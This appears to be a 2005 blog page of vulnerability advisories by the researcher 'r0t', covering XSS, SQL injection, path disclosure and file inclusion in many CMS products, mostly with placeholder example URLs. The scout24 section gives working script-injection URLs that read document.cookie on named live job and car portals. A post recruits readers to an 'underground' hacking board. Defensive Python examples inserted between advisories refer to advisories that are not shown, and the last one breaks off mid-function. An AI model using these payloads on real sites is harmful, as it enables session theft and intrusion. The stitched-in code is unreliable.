    /search.cfm?uselang_en=1&intern=0&targetgroup=pub&fuseaction_sea=results&advanced=1&criteria=r0t&submit.x=33&submit.y=[CODE]

    /search.cfm?uselang_en=1&intern=0&targetgroup=pub&fuseaction_sea=results&advanced=1&criteria=r0t&submit.x=33&submit.y=10&submit=Search&bool=[CODE]

    /search.cfm?uselang_en=1&intern=0&targetgroup=pub&fuseaction_sea=results&advanced=1&criteria=r0t&submit.x=33&submit.y=10&submit=Search&bool=or&itemsperpage=[CODE]

    /search.cfm?uselang_en=1&intern=0&targetgroup=pub&fuseaction_sea=results&advanced=1&criteria=r0t&submit.x=33&submit.y=10&submit=[CODE]

    /search.cfm?uselang_en=1&intern=0&targetgroup=pub&fuseaction_sea=results&advanced=1&criteria=r0t&submit.x=[CODE]

    /search.cfm?uselang_en=1&intern=0&targetgroup=pub&fuseaction_sea=results&advanced=1&criteria=[CODE]

    /search.cfm?uselang_en=1&intern=0&targetgroup=pub&fuseaction_sea=results&advanced=[CODE]

    /search.cfm?uselang_en=1&intern=[CODE]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    contenite XSS vuln.

    Vuln. discovered by : r0t
    Date: 17 dec. 2005
    vendor:http://contenite.de/
    affected version: 0.11 and prior

    Product Description:

    A CMS that stays out of your way: contenite is an embedded content management system (eCMS) which is simple, powerful, and flexible. Now there are no more excuses not to update the front page of your online shop every week or to create a more pleasant-looking entry page for your online forum or community site. contenite is simple to set up through a web-based installer. It is simple to run; it only needs PHP, no database. It is powerful because there is a host of content types bundled with the system. It is flexible because the set of content types is extensible through a simple, object-oriented programming interface. contenite is not for every site. Its architecture makes it well suited for brochure sites with little interaction and few editors. For the web presence of a small to medium enterprise (SME), it is probably all you'll ever need. contenite is a breeze to add to static pages and works well to add that little extra flexibility to your existing CMS. It doesn't insist on managing complete pages. It just cares for those dynamic pieces within. Of course, it can manage your whole site if you like.


    Vuln. Description:

    Contenite contains a flaw that allows a remote cross-site scripting attack. This flaw exists because input passed to the "id" parameter in "home.php" isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    example:

    /home.php?id=[XSS]


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Community Enterprise 4.x Multiple vuln.

    Vuln. discovered by : r0t
    Date: 17 dec. 2005
    vendor:http://www.citysoft.com/
    affected version: 4.x and prior

    Product Description:

    CitySoft's Community Enterprise software platform provides an easy-to-use, flexible CMS module that integrates with a wide variety of built-in applications such as document management, event management, and contact management. Non-technical users can easily create and manage pages and other content online.

    Vuln. Description:

    1.) SQL inj.
    Community Enterprise contains a flaw that allows remote SQL injection attacks. Input passed to the "nodeID", "pageID", "ID", "parentid" and "documentFormatId" parameters isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    2.) XSS
    Community Enterprise contains a flaw that allows a remote cross-site scripting attack. This flaw exists because input passed to the "presentationSite", "docPublishYear", "docDescription", "publishState", "docAuthor", "docTitle", "subTopic", "topic", "topicRadio", "topicOnly", "startrow" and "sortby" parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    3.) Full path
    With the errors from the previous vulns an attacker can get the full install path and other sensitive information. The application also does not verify user input supplied to the "documentid" and "fuseaction" parameters. A malicious person can exploit this to gain knowledge of the full path to the installation directory by sending an HTTP request including invalid input to those parameters.

    examples:

    /index.cfm?fuseaction=page.viewPage&pageID=1&nodeID=1[SQL]

    /index.cfm?fuseaction=page.viewPage&pageID=1[SQL]

    /index.cfm?fuseaction=Document.showDocumentSection&sortby=PublishDate&startrow=8&topicOnly=&topicRadio=&topic=&subTopic=&docTitle=&docAuthor=&publishState=&docDescription=&docPublishYear=&presentationSite=&parentid=16&ID=1[SQL]

    /index.cfm?fuseaction=Document.showDocumentSection&sortby=PublishDate&startrow=8&topicOnly=&topicRadio=&topic=&subTopic=&docTitle=&docAuthor=&publishState=&docDescription=&docPublishYear=&presentationSite=&parentid=[SQL]

    /document/docWindow.cfm?fuseaction=document.viewDocument&documentid=1&documentFormatId=[SQL]


    XSS examples

    /index.cfm?fuseaction=Document.showDocumentSection&sortby=PublishDate&startrow=8&topicOnly=&topicRadio=&topic=&subTopic=&docTitle=&docAuthor=&publishState=&docDescription=&docPublishYear=&presentationSite=[XSS]

    /index.cfm?fuseaction=Document.showDocumentSection&sortby=PublishDate&startrow=8&topicOnly=&topicRadio=&topic=&subTopic=&docTitle=&docAuthor=&publishState=&docDescription=&docPublishYear=[XSS]

    /index.cfm?fuseaction=Document.showDocumentSection&sortby=PublishDate&startrow=8&topicOnly=&topicRadio=&topic=&subTopic=&docTitle=&docAuthor=&publishState=&docDescription=[XSS]

    /index.cfm?fuseaction=Document.showDocumentSection&sortby=PublishDate&startrow=8&topicOnly=&topicRadio=&topic=&subTopic=&docTitle=&docAuthor=&publishState=[XSS]

    /index.cfm?fuseaction=Document.showDocumentSection&sortby=PublishDate&startrow=8&topicOnly=&topicRadio=&topic=&subTopic=&docTitle=&docAuthor=[XSS]

    /index.cfm?fuseaction=Document.showDocumentSection&sortby=PublishDate&startrow=8&topicOnly=&topicRadio=&topic=&subTopic=&docTitle=[XSS]

    /index.cfm?fuseaction=Document.showDocumentSection&sortby=PublishDate&startrow=8&topicOnly=&topicRadio=&topic=&subTopic=[XSS]

    /index.cfm?fuseaction=Document.showDocumentSection&sortby=PublishDate&startrow=8&topicOnly=&topicRadio=&topic=[XSS]

    /index.cfm?fuseaction=Document.showDocumentSection&sortby=PublishDate&startrow=8&topicOnly=&topicRadio=[XSS]

    /index.cfm?fuseaction=Document.showDocumentSection&sortby=PublishDate&startrow=8&topicOnly=[XSS]

    /index.cfm?fuseaction=Document.showDocumentSection&sortby=PublishDate&startrow=[XSS]

    /index.cfm?fuseaction=Document.showDocumentSection&sortby=[XSS]

    Full path example:

    /index.cfm?fuseaction=r0t

    /document/docWindow.cfm?fuseaction=document.viewDocument&documentid=r0t

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Colony CMS XSS vuln.

    Vuln. discovered by : r0t
    Date: 17 dec. 2005
    vendor: http://www.thinkcolony.co.uk
    affected version: 2.75 and prior, also other Colony editions are vuln. like: Colony E–Commerce CMS,Colony Enterprise CMS,Colony Government CMS

    Product Description:

    Colony is a modular website content management system allowing you to micro-manage details on every page to suit your requirements. A number of modules are pre-built and suit the needs of most clients. One of Colony's key strengths is its versatility, which allows modules to be changed or created to exactly meet your needs.


    Vuln. Description:

    Colony contains a flaw that allows a remote cross-site scripting attack. This flaw exists because input passed to the search module parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Cofax XSS vuln.

    Vuln. discovered by : r0t
    Date: 17 dec. 2005
    vendor:http://www.cofax.org
    affected version: 2.0 RC3 and prior

    Product Description

    Cofax is a web-based text and multimedia publication system. It was designed to simplify the presentation of newspapers on the Web and to expedite real-time Web publication. Currently, Cofax is used across the world as an open source, scalable and powerful content management solution provided by numerous independent solution providers.


    Vuln. Description:

    Cofax contains a flaw that allows a remote cross-site scripting attack. This flaw exists because input passed to the "searchstring" parameter isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    example:
    /search.htm?searchstring2=&searchstring=[XSS]


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Caravel CMS XSS

    Vuln. discovered by : r0t
    Date: 17 dec. 2005
    vendor:http://caravelcms.org/
    affected version:3.0 Beta 1 and prior


    Product Description:

    Caravel is an open source, enterprise-grade CMS targeted at large distributed non-profits, denominations, universities, K12 districts, ISPs, municipalities and businesses. It offers WYSIWYG browser-based site editing on Mac, PC and Linux. It scales to thousands of sites and offers specialty features like dynamic site generation, default site inheritance, project management, draggable columns and content blocks, Apache integration, and more.


    Vuln. Description:

    Caravel contains a flaw that allows a remote cross-site scripting attack. This flaw exists because input passed to the "folderviewer_attrs" and "fileDN" parameters in multiple files isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    some examples:

    /Introduction?&CB=CB1&fileDN=[XSS]

    /Community/News?&CB=CB1&fileDN=[XSS]

    /Community/News?&CB=CB1&fileDN=mnF%3Djune2005.html%2CmnOD%3DNewsletter%2CmnOD%3DMy%20Documents%2Cdc%3Demanuel%2Cdc%3Dmennonite%2Cdc%3Dnet&folderviewer_attrs=[XSS]

    /Introduction?&CB=CB1&fileDN=mnF%3D2.3.html%2CmnOD%3DNews%2CmnOD%3DMy%20Documents%2Cdc%3Demanuel%2Cdc%3Dmennonite%2Cdc%3Dnet&folderviewer_attrs=[XSS]


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    bitweaver multiple vuln.

    Vuln. discovered by : r0t
    Date: 17 dec. 2005
    vendor:bitweaver.org
    affected version: 1.1 and 1.1.1 beta and prior

    Product Description:

    bitweaver is a rename of the TikiPro software, and is a web based open-source Web Application Framework software application that offers a wide range of features such as wiki, articles, phpBB bulletin board, newsletter, blogs, image photo gallery, file sharing, link directory, poll/survey, quiz, FAQ, banners, webmail, calendar, category. It is written in PHP and supports MySQL, PostgreSQL, Oracle, Sybase, and FireBird on Windows & Linux.

    Vuln. Description:

    1. SQL inj.

    bitweaver contains a flaw that allows remote SQL injection attacks. Input passed to the "sort_mode", "post_id" and "blog_id" parameters isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    some examples:

    /fisheye/list_galleries.php?sort_mode=[SQL]
    /blogs/view_post.php?post_id=[SQL]
    /blogs/view.php?blog_id=[SQL]
    /messages/message_box.php?sort_mode=[SQL]
    /users/my.php?sort_mode=[SQL]
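    The pattern behind the SQL injection findings on this page (the "id" parameter in e-publish above and the "sort_mode", "post_id" and "blog_id" parameters here) comes down to request values being spliced into query text. The following is an added example in Python with sqlite3, not code from bitweaver or any other vendor on this page; the table, rows and function names are constructed. It shows the string-built query beside a parameterised one and, because a column name used for sorting cannot be bound as a parameter, an allow-list for a sort value such as "sort_mode":

```python
"""Added example, not vendor code: string-built SQL vs. parameterised SQL,
plus an allow-list for a sort parameter. Table and rows are constructed."""
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed stand-in for a CMS "posts" table with one unpublished row.
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE posts (post_id INTEGER PRIMARY KEY, title TEXT, published INTEGER)"
    )
    conn.executemany(
        "INSERT INTO posts VALUES (?, ?, ?)",
        [(1, "Public post", 1), (2, "Draft (private)", 0), (3, "Another public post", 1)],
    )
    return conn


def view_post_vulnerable(conn, post_id: str) -> list:
    # The pattern the advisories describe: the raw request value is pasted
    # into the query text, so whatever it contains is parsed as SQL. An
    # input of "1 OR 1=1" widens the WHERE clause to every row, draft included.
    sql = "SELECT title FROM posts WHERE published = 1 AND post_id = " + post_id
    return [row[0] for row in conn.execute(sql)]


def view_post_fixed(conn, post_id: str) -> list:
    # Validate the shape first, then bind the value as a parameter; the
    # driver sends it as data and never parses it as SQL.
    if not re.fullmatch(r"[0-9]{1,9}", post_id):
        raise ValueError("post_id must be a positive integer")
    sql = "SELECT title FROM posts WHERE published = 1 AND post_id = ?"
    return [row[0] for row in conn.execute(sql, (int(post_id),))]


# Sort columns cannot be bound as parameters, so map the request value to a
# fixed set of column names instead of interpolating it.
ALLOWED_SORT = {"title": "title", "id": "post_id"}


def list_posts_fixed(conn, sort_mode: str) -> list:
    column = ALLOWED_SORT.get(sort_mode)
    if column is None:
        raise ValueError("unknown sort_mode")
    sql = "SELECT title FROM posts WHERE published = 1 ORDER BY " + column
    return [row[0] for row in conn.execute(sql)]


def rejects(func, *args) -> bool:
    """True if func raises ValueError for args (used by the checks below)."""
    try:
        func(*args)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    probe = "1 OR 1=1"  # constructed test value
    print(view_post_vulnerable(db, probe))   # every row, including the draft
    print(rejects(view_post_fixed, db, probe))  # True: rejected before the query
```

    The same two rules cover every SQL finding in these advisories: bind data values, and resolve anything that has to become SQL syntax (column names, sort direction, table names) through a fixed mapping rather than the request.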

    2. XSS

    bitweaver contains a flaw that allows a remote cross-site scripting attack. This flaw exists because input passed to the "sort_mode", "post_id" and "blog_id" parameters and to the search field in "/users/my_groups.php" isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    examples:

    No separate examples are needed; use the examples above and only change the input.

    3. Full path
    With the errors from the previous vulns an attacker can get the full install path and other sensitive information.




    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Baseline CMS vuln.

    Vuln. discovered by : r0t
    Date: 17 dec. 2005
    vendor:http://www.nma.ca/
    affected version: 1.95 and prior

    Product Description:

    Baseline CMS is a powerful, web-based content management system that gives you a fast, easy way to update your website - without having to call a webmaster or learn a programming language. Baseline CMS is an investment in technology that will provide a long-term, highly versatile communication channel with low maintenance costs.

    Vuln. Description:

    1.XSS
    Baseline CMS contains a flaw that allows a remote cross-site scripting attack. This flaw exists because input passed to the "PageID" and "SiteNodeID" parameters in "Page.asp" isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    2.SQL inj.
    Baseline CMS contains a flaw that allows remote SQL injection attacks. Input passed to the "SiteNodeID" parameter in "Page.asp" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    examples:

    /Page.asp?PageID=[XSS]
    /Page.asp?PageID=1&SiteNodeID=[XSS]
    /Page.asp?PageID=1&SiteNodeID=[SQL]
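    The cross-site scripting findings on this page (the "obcatid" and "comid" parameters in e-publish, the "PageID" and "SiteNodeID" parameters here, and the search parameters in several others) all share one cause: a request value is written back into HTML without encoding for the context it lands in. The following is an added example in Python, not code from Baseline CMS or any vendor on this page; the renderers and sample values are constructed. It shows raw reflection beside output encoding for element-body and attribute contexts, plus a small check a QA test can run against a response:

```python
"""Added example, not vendor code: reflected input vs. context-aware output
encoding, with a response check for unescaped reflection. Constructed values."""
import html


def render_search_vulnerable(query: str) -> str:
    # The flaw the advisories describe: the request parameter is written
    # straight into the page body, so markup in it becomes markup in the page.
    return "<p>Results for: " + query + "</p>"


def render_search_fixed(query: str) -> str:
    # Element-body context: escape &, <, > and both quote characters so the
    # browser renders the text instead of parsing it.
    return "<p>Results for: " + html.escape(query, quote=True) + "</p>"


def render_page_link_vulnerable(page_id: str) -> str:
    # Attribute context (PageID / SiteNodeID style values echoed into links):
    # a double quote in the value closes the attribute early.
    return '<a href="Page.asp?PageID=' + page_id + '">next</a>'


def render_page_link_fixed(page_id: str) -> str:
    # For a numeric identifier the strongest fix is to reject anything that is
    # not digits; the escape stays as defence in depth for the attribute.
    if not page_id.isdigit():
        raise ValueError("PageID must be numeric")
    return '<a href="Page.asp?PageID=' + html.escape(page_id, quote=True) + '">next</a>'


def reflects_unescaped(response_body: str, sent_value: str) -> bool:
    """True if the value sent came back verbatim, which is what a reflected
    XSS probe looks for; useful as a regression check in a test suite."""
    return sent_value in response_body


def rejects(render, value: str) -> bool:
    """True if the renderer refuses the value (used by the checks below)."""
    try:
        render(value)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    probe = "<script>alert(1)</script>"  # constructed test value
    print(render_search_vulnerable(probe))
    print(render_search_fixed(probe))
    print(reflects_unescaped(render_search_fixed(probe), probe))  # False
```

    Note that html.escape is correct only for text and quoted-attribute contexts; a value placed inside a script block, a URL scheme or a CSS rule needs a different encoder, and the advisories on this page are all of the text-or-attribute kind.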

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    scout24 vuln.

    jobscout24.de

    http://jobscout24.de/stellenangebote/JSStsuch.asp?PN=2&PS=10&IDSTBF=-54&TBID=%22%3E%3Cscript%3Ealert('document.cookie')%3C/script%3E

    http://jobscout24.de/stellenangebote/JSStsuch.asp?PN=2&PS=10&IDSTBF=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E


    www.autoscout24.de

    http://www.autoscout24.de/home/index/detail.asp?ts=383334.4&id=fgucmbzdefa&source=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

    http://www.autoscout24.de/home/index/search.asp?make=r0t:)

    Other scout24 portals have the same type of vuln.
    Maybe in small applications XSS attacks are nothing, but in big portals like this one they are very dangerous.

    AWF (Adaptive Website Framework) vuln.

    Vuln. discovered by : r0t
    Date: 17 dec. 2005
    vendor:http://www.awf-cms.org
    affected version:2.10 and prior

    Product Description:

    AWF (Adaptive Website Framework) by Liquid Bytes is a Web framework, CMS, Web portal, news system, online community, etc. Its purpose is to simplify Web site creation and present content efficiently. It features design/content separation, multiple designs (themes), personalized page layout, a WYSIWYG editor, a package installer for adding new features with just one click, user/group-management, messaging/community modules, access protection of single pages or site sections, efficient caching, easy to use API functions, export options for documents, the ability to integrate Unix shell scripts or embed PHP code, and support for nearly unlimited languages, documents, and users.



    Vuln. Description:

    1. XSS
    AWF contains a flaw that allows a remote cross-site scripting attack. This flaw exists because input passed to the "page" parameter isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    2. full path
    AWF does not verify user input supplied to the "mode" parameter. A malicious person can exploit this to gain knowledge of the full path to the installation directory by sending an HTTP request including invalid input to that parameter.

    examples:

    /community/account.html?page=[XSS]
    /community.html?mode=x
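    The full-path disclosures on this page (CONTENS, Community Enterprise and the "mode" parameter here) come from the same habit: an unexpected value reaches code that was not written to handle it, and the resulting error page carries the interpreter's own diagnostics, install path included. The following is an added example in Python, not code from AWF or any vendor on this page; the document table and handler names are constructed. It shows the debug-style error page beside a handler that validates the parameter first and keeps the diagnostic detail in the server log:

```python
"""Added example, not vendor code: a handler that leaks its traceback on bad
input beside one that validates first and logs detail server-side only."""
import logging
import re
import traceback

log = logging.getLogger("cms")

# Constructed stand-in for the document store.
DOCUMENTS = {1: "Annual report", 2: "Newsletter"}


def lookup_document(raw_id: str) -> str:
    # int() on input like "x" raises ValueError deep inside the application.
    return DOCUMENTS[int(raw_id)]


def handle_vulnerable(params: dict) -> tuple:
    # Debug-style error page: the formatted traceback contains
    # File "/absolute/path/to/module.py" lines, which is exactly the install
    # path the advisories show being disclosed.
    try:
        return 200, lookup_document(params.get("documentid", ""))
    except Exception:
        return 500, "<pre>" + traceback.format_exc() + "</pre>"


def handle_fixed(params: dict) -> tuple:
    raw_id = params.get("documentid", "")
    # Reject malformed input up front with a generic message; the rejected
    # value is recorded server-side where it is useful for detection.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        log.warning("rejected documentid=%r", raw_id)
        return 400, "Bad request"
    try:
        return 200, lookup_document(raw_id)
    except KeyError:
        return 404, "Not found"
    except Exception:
        # Anything unexpected goes to the log with its traceback; the client
        # sees a fixed string that reveals nothing about the file system.
        log.exception("document lookup failed for documentid=%r", raw_id)
        return 500, "Internal error"


def discloses_path(body: str) -> bool:
    """Cheap check for interpreter diagnostics in a response body."""
    return 'File "' in body or "Traceback (most recent call last)" in body


if __name__ == "__main__":
    bad = {"documentid": "x"}  # constructed probe value
    status, body = handle_vulnerable(bad)
    print(status, discloses_path(body))   # 500 True
    status, body = handle_fixed(bad)
    print(status, discloses_path(body))   # 400 False
```

    The same split applies to any platform on this page: ColdFusion, ASP and PHP each have a setting that turns detailed error pages off in production, and the validation step means most malformed requests never reach the code that could fail.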

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Amaxus vuln.

    Vuln. discovered by : r0t
    Date: 17 dec. 2005
    vendor:http://www.boxuk.com/
    affected version: 3 and prior

    About Amaxus

    Amaxus is Box UK's XML Content Management System, currently delivering hundreds of thousands of documents for a wide variety of organisations.

    Amaxus drives the websites for:

    * An organisation with 42,000 employees
    * A £1.4billion security company
    * An organisation with over 60,000 images
    * The largest maritime museum in the world
    * A 100-million album selling band
    * The most famous war museum in the world
    * A Central-Government department
    * 7000 NHS users (Intranet)
    * A Government education site with 20,000 registered users
    * A site which receives 2.8 million unique users a year
    * A site which has won two prestigious accessibility awards
    * The home of Greenwich Mean Time
    * An NHS Strategic Health Authority serving 1.4 million people

    Amaxus:

    * Was recently chosen out of 150 other CMS providers by the Government
    * Beat off 123 other companies in an OJEC (European Union) tender

    Vuln. Description:

    Amaxus contains a flaw that allows a remote cross-site scripting attack. This flaw exists because input passed to the "change" parameter isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.



    example:

    /?search_word=&search.x=20&search.y=4&change=[XSS]


    bonus :)

    /?search_word=&search.x=20&search.y=4&change=../

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Friday, December 16, 2005

    Allinta 2.3.x XSS vuln.

    Vuln. discovered by : r0t
    Date: 17 dec. 2005
    vendor:http://www.allinta.com/
    affected version:2.3.2 and prior

    Product Description:

    Create an easy to edit instant Multi language web site with full content
    management using a WYSIWYG Editor, Login levels, Audit Trails, Security,
    Statistics, Instant Templates, Access, SQL or MySQL scripts & much more.
    Code ASP 3.0 & VBScript

    Vuln. Description:

    Allinta contains a flaw that allows a remote cross-site scripting attack. This flaw exists because input passed to the "s" parameter in "faq.asp" and the "searchQuery" parameter in "search.asp" isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    examples:

    /faq.asp?s=[XSS]&roottopicID=&sa=1&submit=Search

    /search.asp?searchQuery=[XSS]&go=Search&submitted=true

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Acuity CMS 2.6.x (ASP) XSS vuln.

    Vuln. discovered by : r0t
    Date: 17 dec. 2005
    vendor:http://www.acuitycms.com/
    affected version:2.6.2

    Product Description:

    Acuity CMS is a highly affordable, very easy to use content management system that offers a rich set of features despite its low price point. Advanced WYSIWYG editing (using Acuity Visual Editor), advanced code cleaning, menu management, integrated search, and much more. Although targeted at small to medium business, Acuity CMS can run very large and interactive websites.

    Vuln. Description:

    Acuity CMS contains a flaw that allows a remote cross-site scripting attack. This flaw exists because input passed to the search module parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    +
    note: the "page" parameter also isn't properly sanitised; after some unsanitised input from the user you will get an error like:

    Microsoft VBScript runtime error '800a000d'

    I don't think that is a vuln, but ...

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    RED QUEEN Path Disclosure

    Vuln. discovered by : r0t
    Date: 16 dec. 2005
    vendor:http://www.randommouse.com/cgi-bin/rms/product/about/about_product.cgi?sku=REDQN&referer=hotscripts&creative=link_indexing
    affected version:1.02 and prior

    Product Description:

    Now with zipcode-based searching and image galleries! Large sites rely on user reviews to provide efficient wealth discovery of the content of their pages. Red Queen features the most advanced review system available in a Link Manager. With custom ratings per category, custom SQL fields, file uploads, auto-thumbnailing, templates, forum membership integration, top reviewers, a powerful search engine, link validation, and static page builds among its features, you're set to compete with the big sites. You can even set up Groups for Members to join, Yellow Pages for Suppliers, and everything is reviewable, even the members themselves!


    Vuln. Description:

    RED QUEEN "redqueen.cgi" does not verify user input supplied to the "yellowpage_id", "skin_id" and "supplier_id" parameters. A malicious person can exploit this to gain knowledge of the full path to the installation directory by sending an HTTP request including invalid input to those parameters.

    examples:

    /redqueen.cgi?module=find_supplier&yellowpage_id=x

    /redqueen.cgi?module=supplier&supplier_id=48&skin_id=x

    /redqueen.cgi?module=supplier&supplier_id=x

    /redqueen.cgi?module=x

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    iHTML Merchant Mall SQL inj.

    Vuln. discovered by : r0t
    Date: 16 dec. 2005
    vendor:http://www.ihtmlmerchant.com/features_mall.htm
    affected version: latest

    Product Description:

    The iHTML Merchant Mall is specifically designed for Internet Service Providers and Application Service Providers that are implementing a large number of stores. With a powerful web-based store management area, you can add a new store in seconds. A new hosting customer can even create and setup her own storefront on her own. The Mall allows for an unlimited number of stores to be setup on a single server. The individual stores in the Mall have the same feature set as the iHTML Merchant 2.0 Enterprise edition. Stores can become part of a portal-like store directory, or can be independent with their own domain name. When creating a new store, a mall manager can set up billing options and define the feature set that will be available to the store owner. Preset billing plans can also be created to provide for even faster creation of stores. Stores can be automatically billed their hosting fees, thus automating much of your client management process.
    The Mall edition can also be used by manufacturers to provide pre-populated stores for their resellers, by companies that want to provide a portal for buyers and sellers in a particular industry to gather and place orders plus many more applications that are outside of how you might think of a shopping mall.



    Vuln. Description:

    iHTML Merchant Mall contains a flaw that allows remote SQL injection attacks. Input passed to the "id", "store" and "step" parameters isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    example:

    /browse.ihtml?step=4&store=42&id=[SQL]
    /browse.ihtml?step=4&store=1[SQL]
    /browse.ihtml?step=[SQL]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    iHTML Merchant Version 2 Pro sql inj.

    Vuln. discovered by : r0t
    Date: 16 dec. 2005
    vendor:http://www.ihtmlmerchant.com/features_2_pro.htm
    affected version:2 and prior

    Product Description:

    The iHTML Merchant Pro builds on the success of the first version. Basically we took all the feedback from users and built it into the product. It is an affordable, fully customizable system for creating web storefronts and much more advanced than the first version. Ideal for small and medium sized businesses, it is both powerful and easy to use. ISPs will appreciate the browser-based administration which allows customers to handle their own configuration and changes. Featuring complete banner ad management, several different payment processing options, professional templates and the ability to handle complex shipping and tax calculations, this system is one of the fastest and easiest ways to get high-end stores online.

    Vuln. Description:

    Merchant Version 2 Pro contains a flaw that allows remote SQL injection attacks. Input passed to the "id", "pid" and "step" parameters isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


    example:
    /merchant.ihtml?id=56&step=[SQL]
    /merchant.ihtml?id=[SQL]
    /merchant.ihtml?pid=[SQL]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Webglimpse XSS vuln.

    Vuln. discovered by : r0t
    Date: 16 dec. 2005
    vendor:http://webglimpse.net/
    affected version:2.14.1 and prior

    Product Description:

    Webglimpse can index and search any collection of documents you choose - local files including PDF, MS Word and any others with available filter; and remote files spidered from specified websites. Flexible rules allow you to control output format, ranking of hits, which links are spidered. Language templates include Spanish, German, French, Italian, Norwegian, Finnish, Hebrew, Arabic and more. The core indexing program is in C, and is scalable up to 100s of Gb of data. Web & command line administration interfaces for managing archives. Partnership with SearchFeed allows webmasters to add sponsored links easily to generate revenue from site visitors.


    Vuln. Description:

    Webglimpse contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "ID" parameter in "webglimpse.cgi" isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    example:

    /webglimpse.cgi?query=&ID=1[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Today about us in soon future

    It is close to 1 month since I started to report publicly about unsecured systems on the net.
    Even if I will do it maybe some days more, my way is another way... exploring the net and not reporting about the net.
    Of course my friends think that it is "kindergarten" style to express yourself on the scene, but I think that sometimes you must do some things that must be done.
    I and my friends had a board 1 month ago on hackers.by.lv; now the board is closed for maintenance, but not for long. The board will be back very soon, to give a possibility to share our skills with others.
    Forget about white hat'ism; the board will be in the underground, maybe too deep in the underground. Of course we will share information only for general IT education and not for kiddies who want to get easy fame.
    I wrote this message to those who are ready to be part of a real community and not just for fame stuff on the scene.
    If you are skilled enough to share your skills and experience with others, you will be welcome in our crew.
    Till now our community was international; we had crew members from USA, Latvia, Germany... but it makes no big difference from which part of the globe you come, what matters is what you can do and what you do.
    If you want to join us you can contact me: admin[at]hackers[dot]by[dot]lv

    ezUpload Pro vuln

    ezUpload Pro vuln

    Vuln. discovered by : r0t
    Date: 16 dec. 2005
    vendor:http://www.scriptscenter.com/ezupload/
    affected version: 2.2 and prior

    Product Description:

    ezUpload Pro is the world's most popular PHP upload solution. Packed with features, installed by over 1300 websites, ezUpload Pro has everything you need to allow secure file uploads to your website today! Download uploaded files via our file browser, through FTP (files are put on separate directories) or even receive them as email attachments. Our comprehensive control panel allows to control the files you accept (based on size, extension & dimensions), the fields of the upload form, the general look of the form, who can access the form and much more. New version 2.2 features user authentication, ability to store data in a MySQL database (storage in files still possible), radio boxes and much more.

    Vuln. Description:

    1. Input passed to the "mode" parameter in "index.php" isn't properly verified before it is used to include files. This can be exploited to include arbitrary files from local resources.

    2. Input passed to the search module parameters isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    Solution:
    Edit the source code to ensure that input is properly sanitised.
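For the file inclusion issue (point 1 above) the fix is not escaping but an allowlist: a "mode" value that selects which script to include must be matched against the handful of legal names, and the resolved path should still be checked against the directory it is supposed to live in. The block below is an added example and is not ezUpload's code; Python's open() stands in for PHP's include, and the "modes" directory, the file names and a config.php holding a database password are all assumptions used to show the traversal and its fix.

```python
import os
import tempfile

# Assumed names of the legitimate include targets; anything else is refused outright.
ALLOWED_MODES = {"upload.php", "browse.php"}


def build_webroot() -> str:
    """Constructed directory tree: a modes/ directory plus a config file next to it."""
    root = tempfile.mkdtemp(prefix="ezupload-demo-")
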